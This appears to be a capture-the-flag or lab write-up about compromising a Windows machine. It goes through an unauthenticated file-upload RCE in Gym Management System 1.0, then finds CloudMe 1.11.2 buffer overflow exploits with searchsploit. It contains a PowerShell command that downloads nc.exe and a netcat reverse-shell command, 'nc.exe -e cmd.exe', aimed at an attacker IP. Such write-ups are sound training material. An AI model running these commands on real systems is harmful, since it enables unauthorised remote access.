Initial Access

In the Contact directory we can see a note that says "Made using Gym Management Software 1.0". A quick look at searchsploit reveals that there is an RCE vulnerability in this software.

    ┌──(root㉿kali)
    Gym Management System 1.0 - 'id' SQL Injection                      | php/webapps/48936.txt
    Gym Management System 1.0 - Authentication Bypass                   | php/webapps/48940.txt
    Gym Management System 1.0 - Stored Cross Site Scripting             | php/webapps/48941.txt
    Gym Management System 1.0 - Unauthenticated Remote Code Execution   | php/webapps/48506.py
    WordPress Plugin WPGYM - SQL Injection                              | php/webapps/42801.txt
    Shellcodes: No Results

Gym Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

Shell as shaun

    ┌──(root㉿kali)
    /usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.

The shell I got was very unstable, so I wanted to upgrade it.

    # Copy nc.exe to target machine
    C:\xampp\htdocs\gym\upload> powershell -c (New-Object Net.WebClient).DownloadFile('', 'nc.exe')

    # Start listener and execute nc.exe reverse shell
    C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.18 4444
    Connect to from (UNKNOWN) 50569

Privilege Escalation

Enumeration

After enumerating the machine I found that there were two ports listening on localhost.

    Proto  Local Address          Foreign Address        State           PID

Looking at the processes running I can see that CloudMe is running on port 8888.

Buffer overflow vulnerability

There was also an exe in Shaun's download folder telling me what version of CloudMe is running.

    2 Dir(s)  7,133,970,432 bytes free

    CloudMe 1.11.2 - Buffer Overflow (PoC)                              | windows/remote/48389.py
    CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR)                     | windows/local/48499.txt
    CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR)                     | windows/local/48840.py
    Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit)                    | windows_x86-64/remote/45197.rb
    CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)             | windows_x86-64/local/45159.py
    CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit)      | windows/remote/44175.rb
    CloudMe Sync 1.11.0 - Local Buffer Overflow                         | windows/local/44470.py
    CloudMe Sync 1.11.2 - Buffer Overflow Egghunt                       | windows/remote/46218.py
    CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)            | windows_x86-64/remote/46250.py

Looking at searchsploit output we can see that there is a buffer overflow vulnerability in CloudMe 1.11.2.